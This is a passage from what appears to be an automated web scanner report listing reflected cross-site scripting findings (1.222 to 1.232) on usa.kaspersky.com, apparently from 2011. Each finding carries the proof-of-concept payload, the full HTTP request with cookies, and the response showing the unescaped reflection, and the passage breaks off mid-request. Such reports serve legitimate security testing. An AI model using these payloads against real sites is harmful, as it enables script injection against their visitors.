GET /sites/usa.kaspersky.com/files/home-page-banners/10-KSP-0015-PURE-homepage-banner-updated-eng.swf7c50b"><script>alert(1)</script>3e346afd99a HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_purelaunch_updated-frame.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:23:37 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139017"
Content-Type: text/html; charset=utf-8
Content-Length: 34827
Date: Sun, 04 Sep 2011 12:23:45 GMT
X-Varnish: 1163052091
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/10-KSP-0015-PURE-homepage-banner-updated-eng.swf7c50b"><script>alert(1)</script>3e346afd99a" />
...[SNIP]...

1.222. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/2012_launch_promo_frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/2012_launch_promo_frame.swf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1c44"-alert(1)-"37a9394198f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/2012_launch_promo_frame.swfe1c44"-alert(1)-"37a9394198f HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_2012_launch_promo_frame.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:22:49 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138969"
Content-Type: text/html; charset=utf-8
Content-Length: 33294
Date: Sun, 04 Sep 2011 12:22:52 GMT
X-Varnish: 1163050877
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/2012_launch_promo_frame.swfe1c44"-alert(1)-"37a9394198f";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.223. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/2012_launch_promo_frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/2012_launch_promo_frame.swf

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4525b"><script>alert(1)</script>9a663ec799f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/2012_launch_promo_frame.swf4525b"><script>alert(1)</script>9a663ec799f HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_2012_launch_promo_frame.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:22:30 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138950"
Content-Type: text/html; charset=utf-8
Content-Length: 35966
Date: Sun, 04 Sep 2011 12:22:33 GMT
X-Varnish: 1163050341
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/2012_launch_promo_frame.swf4525b"><script>alert(1)</script>9a663ec799f" />
...[SNIP]...

1.224. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/PURE_summer_promo_frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/PURE_summer_promo_frame.swf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c23b"-alert(1)-"10b2e9cbe39 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/PURE_summer_promo_frame.swf4c23b"-alert(1)-"10b2e9cbe39 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_PURE_summer_promo_frame.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:24:31 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139071"
Content-Type: text/html; charset=utf-8
Content-Length: 33377
Date: Sun, 04 Sep 2011 12:24:38 GMT
X-Varnish: 1163053672
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/PURE_summer_promo_frame.swf4c23b"-alert(1)-"10b2e9cbe39";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.225. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/business_launch_frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/business_launch_frame.swf

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fc41"><script>alert(1)</script>e87ad2737ca was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/business_launch_frame.swf5fc41"><script>alert(1)</script>e87ad2737ca HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_business_launch_frame.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:25:10 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139110"
Content-Type: text/html; charset=utf-8
Content-Length: 35768
Date: Sun, 04 Sep 2011 12:25:23 GMT
X-Varnish: 1163054728
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/business_launch_frame.swf5fc41"><script>alert(1)</script>e87ad2737ca" />
...[SNIP]...

1.226. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/business_launch_frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/business_launch_frame.swf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86da1"-alert(1)-"46ad7e8ba57 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/business_launch_frame.swf86da1"-alert(1)-"46ad7e8ba57 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_business_launch_frame.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:25:43 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139143"
Content-Type: text/html; charset=utf-8
Content-Length: 40014
Date: Sun, 04 Sep 2011 12:25:58 GMT
X-Varnish: 1163055629
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/business_launch_frame.swf86da1"-alert(1)-"46ad7e8ba57";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.227. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_2012_launch_promo_frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/loader_2012_launch_promo_frame.swf

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ef39"><script>alert(1)</script>823d4acb16c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/loader_2012_launch_promo_frame.swf2ef39"><script>alert(1)</script>823d4acb16c HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:21:58 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138918"
Content-Type: text/html; charset=utf-8
Content-Length: 33432
Date: Sun, 04 Sep 2011 12:22:00 GMT
X-Varnish: 1163049311
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_2012_launch_promo_frame.swf2ef39"><script>alert(1)</script>823d4acb16c" />
...[SNIP]...

1.228. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_2012_launch_promo_frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/loader_2012_launch_promo_frame.swf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a3de"-alert(1)-"0ee1a331aeb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/loader_2012_launch_promo_frame.swf5a3de"-alert(1)-"0ee1a331aeb HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:22:06 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138926"
Content-Type: text/html; charset=utf-8
Content-Length: 30989
Date: Sun, 04 Sep 2011 12:22:09 GMT
X-Varnish: 1163049623
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
me;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_2012_launch_promo_frame.swf5a3de"-alert(1)-"0ee1a331aeb";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.229. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_PURE_summer_promo_frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/loader_PURE_summer_promo_frame.swf

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ae0a"><script>alert(1)</script>bf723308b25 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/2ae0a"><script>alert(1)</script>bf723308b25 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:22:46 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138966"
Content-Type: text/html; charset=utf-8
Content-Length: 36457
Date: Sun, 04 Sep 2011 12:22:51 GMT
X-Varnish: 1163050813
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/2ae0a"><script>alert(1)</script>bf723308b25" />
...[SNIP]...

1.230. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_PURE_summer_promo_frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/loader_PURE_summer_promo_frame.swf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fd35"-alert(1)-"dcc2d772d0d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/7fd35"-alert(1)-"dcc2d772d0d HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:23:01 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138981"
Content-Type: text/html; charset=utf-8
Content-Length: 40042
Date: Sun, 04 Sep 2011 12:23:04 GMT
X-Varnish: 1163051210
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
me = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/7fd35"-alert(1)-"dcc2d772d0d";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.231. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_business_launch_frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/loader_business_launch_frame.swf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93a5a"-alert(1)-"05956d8a4dd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/loader_business_launch_frame.swf93a5a"-alert(1)-"05956d8a4dd HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:24:18 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139058"
Content-Type: text/html; charset=utf-8
Content-Length: 32261
Date: Sun, 04 Sep 2011 12:24:22 GMT
X-Varnish: 1163053367
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
Name;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_business_launch_frame.swf93a5a"-alert(1)-"05956d8a4dd";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.232. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_business_launch_frame.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/loader_business_launch_frame.swf

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53d42"><script>alert(1)</script>5b132f4cd0b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/loader_business_launch_frame.swf53d42"><script>alert(1)</script>5b132f4cd0b HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
